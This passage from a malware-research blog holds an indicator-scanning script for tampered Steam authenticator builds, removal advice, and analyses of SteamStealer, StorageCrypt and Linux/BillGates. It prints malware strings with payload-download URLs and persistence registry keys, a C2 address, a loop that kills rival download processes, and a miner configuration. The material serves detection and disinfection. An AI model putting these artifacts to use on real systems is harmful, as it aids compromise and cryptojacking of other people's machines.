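    "91.227.16.31",
]


def encodings_of(indicator: str) -> Dict[str, bytes]:
    """Byte patterns to search for: plain ASCII and UTF-16LE (as .NET stores literals)."""
    return {
        "ascii": indicator.encode("ascii"),
        "utf-16le": indicator.encode("utf-16-le"),
    }


def find_indicators(data: bytes, indicators: List[str] = SDA_INDICATORS) -> List[dict]:
    """Locate every indicator in `data`, in either encoding, case-insensitively.

    Returns a list of {"indicator", "encoding", "offset"} hits ordered by offset.
    """
    hits = []
    for ind in indicators:
        for enc_name, pattern in encodings_of(ind).items():
            # re.escape keeps the dots literal; IGNORECASE covers mixed-case hosts
            # and is ASCII-only for bytes patterns, so the UTF-16LE NUL bytes are unaffected.
            for m in re.finditer(re.escape(pattern), data, re.IGNORECASE):
                hits.append({"indicator": ind, "encoding": enc_name, "offset": m.start()})
    return sorted(hits, key=lambda h: h["offset"])


def md5_hex(data: bytes) -> str:
    """MD5 of the executable bytes, for comparison with the hash published above."""
    return hashlib.md5(data).hexdigest()


def assess(data: bytes) -> dict:
    """Combine the hash comparison and the string sweep into one verdict."""
    digest = md5_hex(data)
    hits = find_indicators(data)
    if digest == FAKE_SDA_MD5:
        verdict = "known-bad"        # exact match with the tampered build
    elif hits:
        verdict = "suspicious"       # unknown build, but embeds exfiltration indicators
    else:
        verdict = "no-indicators"    # not a proof of cleanliness, only an absence of hits
    return {"md5": digest, "hits": hits, "verdict": verdict}


# --- constructed demo inputs (not real samples) -----------------------------
# Stand-in for a tampered .NET build: a fake PE header, the exfil URL as a
# UTF-16LE literal, then a second indicator stored as plain ASCII.
DEMO_TAMPERED = (b"MZ\x90\x00" + b"\x00" * 32
                 + "https://steamdesktopauthenticator.com/".encode("utf-16-le")
                 + b"\x00" * 8 + b"lightalex.ru")
# Stand-in for a clean build: only the legitimate Steam community host.
DEMO_CLEAN = b"MZ\x90\x00" + "https://steamcommunity.com/".encode("utf-16-le")

if __name__ == "__main__":
    for name, blob in (("tampered", DEMO_TAMPERED), ("clean", DEMO_CLEAN)):
        result = assess(blob)
        print(f"{name}: verdict={result['verdict']} md5={result['md5']}")
        for hit in result["hits"]:
            print(f"  {hit['indicator']} ({hit['encoding']}) at offset {hit['offset']}")
```

To check a real download, read the executable with `open(path, "rb").read()` and pass the bytes to `assess`.<br />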
<br />
<br />
<br />
<b><span style="font-size: large;">Disinfection</span></b><br />
<br />
Neither of the fake SDA versions reported here appears to implement any persistence; in other words, remove the fake version by deleting it, and perform a scan with your current antivirus and a scan with another, online antivirus, or with <a href="https://www.malwarebytes.com/" target="_blank">Malwarebytes</a> for example.<br />
<br />
Additionally, de-authorize all other devices by clicking <a href="https://store.steampowered.com/twofactor/manage" target="_blank">here</a> and selecting "Deauthorize all other devices".<br />
<br />
Now, change your password for Steam, and enable <a href="https://support.steampowered.com/kb_article.php?ref=1266-OAFV-8478#steamguard" target="_blank">Steam Guard</a> if you have not yet done so.<br />
<br />
<br />
<br />
<b><span style="font-size: large;">Prevention</span></b><br />
<br />
Prevention advice is the usual; extended advice is provided in a previous blog post <a href="https://bartblaze.blogspot.co.uk/2014/11/malware-spreading-via-steam-chat.html#prevention" target="_blank">here</a>.<br />
<br />
You may also want to take a look at SteamRep's Safe Trading Practices <a href="https://forums.steamrep.com/pages/safetrading/" target="_blank">here</a>.<br />
<br />
Always download any software from the original source - this means the vendor's website, or in this case, the <b>official SDA repository on GitHub</b>:<br />
<a href="https://github.com/Jessecar96/SteamDesktopAuthenticator">https://github.com/Jessecar96/SteamDesktopAuthenticator</a><br />
<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
SteamStealer malware is alive and well, as seen from my <a href="https://bartblaze.blogspot.co.uk/2018/01/quickpost-steamstealers-via-github.html" target="_blank">January blog post</a>. This is yet another attempt to scam users, and variations will continue to emerge.<br />
<br />
Follow the prevention tips above or <a href="https://bartblaze.blogspot.co.uk/2014/11/malware-spreading-via-steam-chat.html#prevention" target="_blank">here</a> to stay safe.<br />
<br />
<br />
<b>Indicators</b><br />
<br />
<script src="https://otx.alienvault.com/pulse/5a933d099e7d6c6780e3b570.js"></script>
<br />
<b><span style="font-size: large;">Malware Analysis, Threat Intelligence and Reverse Engineering: workshop slides</span></b><br />
Bart, 2018-02-08<br />
Last month I gave a workshop for a group of 20-25 enthusiastic women, all either starting out in infosec or interested in starting in this field.<br />
<br />
The event, now obviously expired, can be found here:<br />
<a href="https://www.eventbrite.com/e/cwf-women-in-cyber-event-1-malware-fundamentals-tickets-41239913692#" target="_blank">CWF Women in Cyber Event #1: Malware Fundamentals</a><br />
<br />
For that purpose, I had created a full workshop: a slide deck introducing the concepts of Malware Analysis, Threat Intelligence and Reverse Engineering.<br />
<br />
The idea was to convey these topics in a clear and <i>approachable </i>manner, both in theory and in practice; for the latter, I had set up a custom VM with labs, including applications I created myself, some with simple obfuscation.<br />
<br />
All participants were very enthusiastic, and I hope to have inspired at least some, if not most, of them to pursue a career in this field. For this exact reason, I am now releasing the presentation to the public; the VM and recordings however will not be published, as I created these solely for CWF.<br />
<br />
You may however download the LAB material from Github below:<br />
<a href="https://github.com/bartblaze/MaTiRe">https://github.com/bartblaze/MaTiRe</a><br />
<br />
Without any further ado, you may find the slides below, on either SlideShare or SpeakerDeck:<br />
<br />
<i>SlideShare</i><br />
<br />
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/eTJDZt2i7G2B6U" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/bartblaze/malware-analysis-threat-intelligence-and-reverse-engineering" target="_blank" title="Malware analysis, threat intelligence and reverse engineering">Malware analysis, threat intelligence and reverse engineering</a> </strong> from <strong><a href="https://www.slideshare.net/bartblaze" target="_blank">bartblaze</a></strong> </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<i>SpeakerDeck</i><br />
<i><br /></i>
<script async="" class="speakerdeck-embed" data-id="f423fc8e44054085ba4d3a6b7ab8ac9c" data-ratio="1.77777777777778" src="//speakerdeck.com/assets/embed.js"></script>
<br />
<br />
<br />
Any feedback is always appreciated.<br />
<br />
I would also like to thank <a href="https://twitter.com/eilah_tan" target="_blank">Nathalie</a> for putting me in touch with <a href="https://twitter.com/rosannakurrer" target="_blank">Rosanna</a>, the organiser of the <a href="https://twitter.com/CyberWayFinder" target="_blank">CyberWayFinder</a> program. And of course, my gratitude to all the attendees for making it!<br />
<br />
<i>Mind the disclaimer for the slides. License: CC Attribution-NonCommercial-NoDerivs License</i><br />
<b><span style="font-size: large;">Quickpost: SteamStealers via Github</span></b><br />
Bart, 2018-01-24<br />
Back in 2014, I created a blog post named 'Malware spreading via Steam chat', where I analysed and discussed one of the first 'SteamStealers' - malware that is exclusively targeting gamers, or at least those who use Steam.<br />
<br />
You can read that blog post <a href="https://bartblaze.blogspot.co.uk/2014/11/malware-spreading-via-steam-chat.html" target="_blank">here</a>. Another SteamStealer technique was via a <a href="https://bartblaze.blogspot.co.uk/2016/01/chrome-extension-empties-your-steam.html" target="_blank">Chrome extension</a>, and there are many others reported as well - if you fancy a read, check out a blog post and paper I co-authored with Santiago <a href="https://securelist.com/all-your-creds-are-belong-to-us/74137/" target="_blank">here</a>.<br />
<br />
This blog is meant as a quick post and heads-up, as some cybercriminals who use SteamStealer are now also resorting to using Github. I was notified of this by Malwarehunterteam on Twitter:<br />
<br />
<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
Also, anyone seen before a malware which replaces Steam trade links?<br />
cc <a href="https://twitter.com/bartblaze?ref_src=twsrc%5Etfw">@bartblaze</a> <a href="https://twitter.com/spontiroli?ref_src=twsrc%5Etfw">@spontiroli</a> <a href="https://t.co/XFcVQKy4On">pic.twitter.com/XFcVQKy4On</a></div>
— MalwareHunterTeam (@malwrhunterteam) <a href="https://twitter.com/malwrhunterteam/status/951803848192090114?ref_src=twsrc%5Etfw">January 12, 2018</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<br />
<br />
In this example, Evrial uses Github to copy/steal clipboard contents, and replaces Steam trade offer links. Note that Evrial is a full-blown infostealer.<br />
<br />
<br />
Another recent example, given to me by <i>advicebanana</i>, is a SteamStealer for the sole purpose of stealing your Steam credentials. In this specific case, the malware was redirected from:<br />
<i>http://screenpicture[.]pro/image293[.]jpg </i>to the following page or Gist, hosted on Github:<br />
<i>https://raw.githubusercontent[.]com/Hamlo22888/Sur/master/image293[.]scr</i><br />
<br />
While the gist is already offline at the time of posting, it's possible some Steam users may have been tricked into downloading and executing the file.<br />
<br />
It is interesting to note that the debug (PDB) path in this specific sample is:<br />
<blockquote class="tr_bq">
<i>D:\asd\php\steam_complex\New_steal\new_steal_no_proxy\14ver -original(pubg+??????????)\SteamStealer\obj\Release\vv.pdb</i></blockquote>
While in my original blog post, from 2014, it was as follows:<br />
<br />
<blockquote class="tr_bq">
<i>d:\asd\????????_new\??#\add\SteamComplex\SteamStealer\?????????? ?????????? (18)\SteamStealer\obj\Release\vv.pdb</i></blockquote>
<br />
It appears the original SteamStealer developer is still going strong.<br />
<br />
To avoid getting scammed or ending up with a SteamStealer on your machine, follow the prevention tips in <a href="https://bartblaze.blogspot.co.uk/2014/11/malware-spreading-via-steam-chat.html" target="_blank">this</a> blog post.<br />
<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
SteamStealers are (again) alive and well. While a drop was observed at some point, due to the enormous number of scam websites, it appears the SteamStealer <i>malware</i> is back in business.<br />
<br />
Github is also getting more popular among cybercriminals: often whitelisted in organisations, it offers yet another method of hosting malware.<br />
<br />
As mentioned before, follow the prevention tips in my earlier blog post to stay safe.<br />
<br />
<br />
<b>Indicators</b><br />
<b><br /></b>
<script src="https://otx.alienvault.com/pulse/5a68fb2f6ed6947c069e1409.js"></script>
<b><br /></b>
<b><span style="font-size: large;">StorageCrypt ransomware, a coinminer and more</span></b><br />
Bart, 2017-12-06<br />
<br />
Lawrence over at Bleeping Computer posted an interesting blog yesterday:<br />
<a href="https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/" target="_blank">StorageCrypt Ransomware Infecting NAS Devices Using SambaCry</a><br />
<br />
In that post, Lawrence pointed out that quite a few users had issues with a new ransomware, dubbed StorageCrypt, possibly spread via a worm.<br />
<br />
There is a Windows component and a Linux component. We'll briefly take a look at both, hopefully providing some additional insight and indicators.<br />
<br />
<br />
<b><span style="font-size: large;">Windows </span></b><span style="font-size: large;"><b>artifacts</b></span><br />
<br />
美女与野兽.exe is the Windows component; as pointed out by Lawrence, its name translates loosely to 'Beauty and the Beast'.<br />
<br />
This executable is packed with ASPack, and appears to display worm-like and backdoor behaviour, with the additional 'feature' of spreading itself via removable drives. After unpacking the sample, it reveals some interesting strings:<br />
<br />
<blockquote class="tr_bq">
<i>1.vbp</i><br />
<i>SMSS.EXE</i><br />
<i>http://www.freewebs.com/kelly6666/sm.txt</i><br />
<i>http://www.freewebs.com/kelly6666/lo.txt</i><br />
<i>DBST32NT.LOG</i><br />
<i>.bak</i><br />
<i>.exe</i><br />
<i>V1.8</i><br />
<i>Start Success</i><br />
<i>.log</i><br />
<i>yyyymmddmmss</i><br />
<i>Txt Open ,Repair the application!</i><br />
<i> is running, Repair the application from backup.</i><br />
<i> is running, Repair the application from MySelf.</i><br />
<i> running</i><br />
<i> is running, update the application !</i><br />
<i>Get V Data!</i><br />
<i>Read Tname to memory</i><br />
<i>.ico</i><br />
<i>Kill ico</i><br />
<i>ExtractIcons...</i><br />
<i>Write to Tname...</i><br />
<i>ip addr added</i><br />
<i>GetFolderFileDate...</i><br />
<i>Replace all attrib.</i><br />
<i>I m here!--></i><br />
<i>Insert Error :</i><br />
<i> for </i><br />
<i>.dll</i><br />
<i>.dll </i><br />
<i>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</i><br />
<i>Shell</i><br />
<i>explorer.exe </i><br />
<i>Userinit</i><br />
<i>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</i><br />
<i>Windows9xPacks</i><br />
<i>HKEY_CLASSES_ROOT\txtfile\shell\open\command</i><br />
<i> NOTEPAD.EXE %1</i><br />
<i>HKEY_</i><br />
<i>HKEY_CLASSES_ROOT</i><br />
<i>HKEY_CURRENT_USER</i><br />
<i>HKEY_LOCAL_MACHINE</i><br />
<i>HKEY_USERS</i><br />
<i>HKEY_PERFORMANCE_DATA</i><br />
<i>HKEY_CURRENT_CONFIG</i><br />
<i>HKEY_DYN_DATA</i><br />
<i>Error</i><br />
<i>C:\boot_net.dat</i><br />
<i>C:\dosnal.exe</i><br />
<i>Find all exe file from Local host</i><br />
<i>*.exe</i><br />
<i>Download files is accomplish!</i><br />
<i>Run files of download is success!</i><br />
<i>[autorun]</i><br />
<i>Download files1 is accomplish!</i><br />
<i>Run files1 of download is success!</i><br />
<i>This program cannot be run in DOS mode.</i><br />
<i>This program must be run under Win32</i><br />
<i>Autorun.inf</i><br />
<i>success</i><br />
<i>.txt</i><br />
<i>cmd.exe /C net view </i><br />
<i>command.exe /C net view </i><br />
<i> to find to Create file</i><br />
<i>.exe</i><br />
<i>open=</i><br />
<i>.exe</i><br />
<i>Get Local host IP: </i><br />
<i>Rnd IP:</i><br />
<i>Disk</i><br />
<i>C:\dntboot.bin</i><br />
<i>ip packet too_big</i><br />
<i>ip unload</i></blockquote>
Whatever was hosted at www.freewebs[.]com cannot be retrieved, as the site no longer exists.<br />
<br />
In any case, binaries similar to this one appear to have been floating around the web for quite a while, as can be observed in <a href="https://totalhash.cymru.com/analysis/?b20b44586f6bdc40a929ef32a87e2df2148d32b5" target="_blank">this analysis result</a> from <b>2013</b> by Team Cymru's TotalHash.<br />
<br />
I've uploaded the unpacked sample on <a href="https://www.reverse.it/sample/9be4f45f531dab5401444761e83891b53dccdb926fdfe57643b8e53338e65d4f?environmentId=100" target="_blank">Hybrid Analysis</a>.<br />
<br />
<br />
<b><span style="font-size: large;">Linux </span></b><span style="font-size: large;"><b>artifacts</b></span><br />
<b><span style="font-size: large;"><br /></span></b>
The Linux component appears to be built around a Samba vulnerability, dubbed SambaCry and assigned <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-7494" target="_blank">CVE-2017-7494</a> earlier this year.<br />
<br />
There are several components, which are listed in the table below.<br />
<br />
<br />
<table border="0" cellspacing="0">
<colgroup width="85"></colgroup>
<colgroup width="240"></colgroup>
<colgroup width="146"></colgroup>
<tbody>
<tr>
<td align="left" height="17" style="border: 1px solid #000000;"><b>Filename</b></td>
<td align="left" style="border: 1px solid #000000;"><b>MD5 hash</b></td>
<td align="left" style="border: 1px solid #000000;"><b>Purpose</b></td>
</tr>
<tr>
<td align="left" height="17" style="border: 1px solid #000000;">kJn8LUAZ.so</td>
<td align="left" style="border: 1px solid #000000;">6b5b4fce04f36101c04c0c5b3f7935ea</td>
<td align="left" style="border: 1px solid #000000;">Downloads 'sambacry'</td>
</tr>
<tr>
<td align="left" height="17" style="border: 1px solid #000000;">ZbdofxPY.so</td>
<td align="left" style="border: 1px solid #000000;">053bb22c2cedf5aa5a089bfd2acd31f6</td>
<td align="left" style="border: 1px solid #000000;">Downloads 'sambacry'</td>
</tr>
<tr>
<td align="left" height="17" style="border: 1px solid #000000;">sambacry</td>
<td align="left" style="border: 1px solid #000000;">ffe17e314f7b1306b8badec03c36ccb4</td>
<td align="left" style="border: 1px solid #000000;">Fetches other payloads</td>
</tr>
<tr>
<td align="left" height="17" style="border: 1px solid #000000;">httpd1</td>
<td align="left" style="border: 1px solid #000000;">a5e8cb2e7b84081f5b1f2867f2d26e81</td>
<td align="left" style="border: 1px solid #000000;">Miner config</td>
</tr>
<tr>
<td align="left" height="17" style="border: 1px solid #000000;">minerd32</td>
<td align="left" style="border: 1px solid #000000;">a016b34ade18626f91d14e46588d6483</td>
<td align="left" style="border: 1px solid #000000;">Coinminer</td>
</tr>
<tr>
<td align="left" height="17" style="border: 1px solid #000000;">watchcat32</td>
<td align="left" style="border: 1px solid #000000;">ac9ad6bc8cd8118eaeb204c2ebf95441</td>
<td align="left" style="border: 1px solid #000000;">Watchdog</td>
</tr>
</tbody></table>
<br />
<div>
The 'sambacry' binary will, after one of the .so files has downloaded it, download a set of other files from the C2 server, which is 45.76.102[.]45.</div>
<div>
<br /></div>
<div>
These files support the coin mining; alongside them, what appears to be a watchdog is installed, which monitors the miner process. Additionally, it runs the following in a loop, killing any wget or curl process that is not talking to the C2 server:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>while true<br />
do<br />
&nbsp;&nbsp;&nbsp;&nbsp;ps -ef|grep -E "wget|curl"|grep -v $$|grep -v 45.76.102.45|awk '{print $2}'|xargs kill -9<br />
done</i></blockquote>
</div>
<div>
<br /></div>
<div>
Whoever's behind this campaign is using the email address madhatterss@protonmail[.]com, as defined in the miner configuration:<br />
<br />
<blockquote class="tr_bq">
<i>{<br /> "url" : "stratum+tcp://xmr.pool.minergate.com:45560",<br /> "user" : "madhatterss@protonmail.com",<br /> "pass" : "x",<br /> "algo" : "cryptonight"<br />}</i></blockquote>
<br />
While analysing both the Windows and Linux artifacts, I have not observed any ransomware behaviour, so the ransomware is likely installed manually by the attacker at a later stage.</div>
<div>
<br /></div>
<div>
If you run a Samba server, patch immediately, as this vulnerability was already reported in April.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>Indicators</b></div>
<div>
<b><br /></b></div>
<div>
<script src="https://otx.alienvault.com/pulse/5a286763067de40849f87bdd.js"></script>
<b><br /></b></div>
<div>
<b><br /></b></div>
<b><span style="font-size: large;">Notes on Linux/BillGates</span></b><br />
Bart, 2017-12-03<br />
<br />
In a previous blog post, I wrote some (extensive) notes on Linux/Xor.DDoS, also known as just Xor.DDoS, an interesting type of Linux malware.<br />
<br />
You can find that particular blog below, in which I give some history, details, remediation and prevention in regards to the specific threat Xor.DDoS poses:<br />
<a href="https://bartblaze.blogspot.co.uk/2015/09/notes-on-linuxxorddos.html" target="_blank">Notes on Linux/Xor.DDoS</a><br />
<br />
This post will include some notes on Linux/BillGates, hereafter referred to as just 'BillGates', and rather than being very in-depth as the previous blog, I will mostly list high-level notes and remediation or disinfection steps. Additionally, after the conclusion, you will find other resources if necessary. In case of questions, comments or feedback, leave a <a href="https://bartblaze.blogspot.co.uk/2017/12/notes-on-linuxbillgates.html#comments" target="_blank">comment</a> or contact me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>.<br />
<br />
<br />
<b><span style="font-size: large;">What is BillGates?</span></b><br />
<br />
BillGates is malware targeting Linux; infected machines form a botnet that is mostly used for DDoS attacks.<br />
<br />
However, just like Xor.DDoS, it has limited rootkit and backdoor functionality, so the operator can also execute remote commands and download additional malware onto the host.<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">How can I identify BillGates artefacts?</span></b></div>
<div>
<br /></div>
<div>
Please find below a table with indicators.</div>
<div>
<br /></div>
<table border="0" cellspacing="0">
<colgroup width="180"></colgroup>
<colgroup width="414"></colgroup>
<tbody>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><b>Indicator</b></td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><b>Notes</b></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/cmd.n</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/conf.n</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/init.d/DbSecuritySpt</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/init.d/selinux</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/etc/rc<b>X</b>.d/97DbSecuritySpt </td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Where X is a runlevel number; usually a symlink to /etc/init.d/DbSecuritySpt</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/home/ll2 </td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all files with random names in /home/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/.bash_root.tmp3</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/.bash_root.tmp3h</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/bill.lock </td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all .lock files in /tmp/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/bill.lod </td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Contains Process ID (PID) of malware main module</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/gates.lod <br />
(or gates.lock)</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Contains PID of malware main module</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/moni.lod<br />
(or moni.lock)</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Contains PID of malware 'watchdog'</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/tmp/notify.file</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/*.lock</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all .lock files in /usr/bin/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/bsd-port/.sshd</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/bsd-port/*.lock</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/bsd-port/getty</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;"><br /></td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/bsd-port/getty/*.lock</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all .lock files in /usr/bin/bsd-port/getty/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/bin/pojie</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Identify all files with random names in /usr/bin/</td>
</tr>
<tr>
<td align="left" height="17" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">/usr/lib/libamplify.so</td>
<td align="left" style="border-bottom: 1px solid #000000; border-left: 1px solid #000000; border-right: 1px solid #000000; border-top: 1px solid #000000;">Configuration file</td>
</tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">How can I identify BillGates DDoS modules?</span></b><br />
<b><span style="font-size: large;"><br /></span></b>
These modules are usually stored in <b>/etc/</b>, and will have the following names:<br />
<br />
<ul>
<li>atddd </li>
<li>cupsdd </li>
<li>cupsddh </li>
<li>ksapdd </li>
<li>kysapdd </li>
<li>sksapdd</li>
<li>skysapdd</li>
</ul>
<br />
It may however be useful to run the find command with these names, in case the modules reside somewhere other than /etc/.<br />
<br />
<br />
<b><span style="font-size: large;">How can I identify other modifications BillGates made?</span></b><br />
<b><br /></b>
BillGates creates aliases for, or modifies or replaces, the tools typically used to monitor processes and the network, so their output cannot be trusted on an infected host. The following may be replaced:<br />
<br />
<br />
<ul>
<li>/bin/lsof</li>
<li>/bin/netstat</li>
<li>/bin/ps</li>
<li>/bin/ss</li>
<li>/usr/bin/lsof</li>
<li>/usr/bin/netstat</li>
<li>/usr/bin/ps</li>
<li>/usr/bin/ss</li>
<li>/usr/sbin/lsof</li>
<li>/usr/sbin/netstat</li>
<li>/usr/sbin/ps</li>
<li>/usr/sbin/ss</li>
</ul>
<br />
<div>
A copy of the legitimate files is normally stored in:</div>
<div>
<b>/usr/bin/dpkgd/</b></div>
<br />
Additionally, check for any jobs the malware may have created by looking in:<br />
<b>/etc/cron.*</b>, for example /etc/cron.d, /etc/cron.daily or /etc/cron.hourly, as well as /etc/crontab itself.<br />
<br />
You may also wish to look in:<br />
<b>/var/spool/cron/</b><br />
<br />
<br />
<b><span style="font-size: large;">Removal instructions</span></b><br />
<b><span style="font-size: large;"><br /></span></b>
While the <b>ps </b>command may be replaced, <b>top</b> is not. Run the <b>top</b> command and look for illegitimate processes; they are usually randomly named. Alternatively, identify the *.lod and *.lock files and read them with <b>cat</b> for example, as they contain the PIDs of the malware's main module and watchdog. Since ps, netstat, lsof and ss may be trojaned, do not rely on their output: run the clean copies from /usr/bin/dpkgd/ instead, or list /proc/[0-9]* directly.<br />
<br />
Then, use <b>kill</b> to end the malicious process(es); kill the watchdog and the main module in the same command, so that neither survives to restart the other. Next, remove the files or artefacts as indicated in the table above.<br />
<br />
Afterwards, use <b>mv </b>to move the legitimate files back to their original location, and verify the restored binaries with your package manager (<b>dpkg -V</b> on Debian-based systems, <b>rpm -Va</b> on RPM-based ones), or simply reinstall the affected packages. You can also use a file manager to easily move them, if you have one.<br />
<br />
You may also use an anti-virus to identify and remove any malicious files, for example <a href="https://www.clamav.net/" target="_blank">ClamAV</a> does a great job - BillGates is a rather older botnet by now and thus most antiviruses should have coverage for it. Don't forget to update the anti-virus' signatures first, if needed.<br />
<br />
This same explanation but step-by-step to make it easy:<br />
<br />
<br />
<ul>
<li>Identify malicious processes: use <b>top</b> or check the PID in BillGates' config files;</li>
<li>Kill malicious processes: use <b>kill -9 &lt;pid&gt;</b>, killing the watchdog and the main module in one command;</li>
<li>Remove malicious files and folders, see the sections above;</li>
<li>Replace potentially hijacked files and restore them to their original location, see also above;</li>
<li>Identify any malicious tasks and delete them as indicated above;</li>
<li>Run <b>top</b> again to verify there are no malicious processes left;</li>
<li>Run an anti-virus or anti-malware as a secondary opinion;</li>
<li>Change your passwords, better be safe than sorry!</li>
</ul>
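<div>
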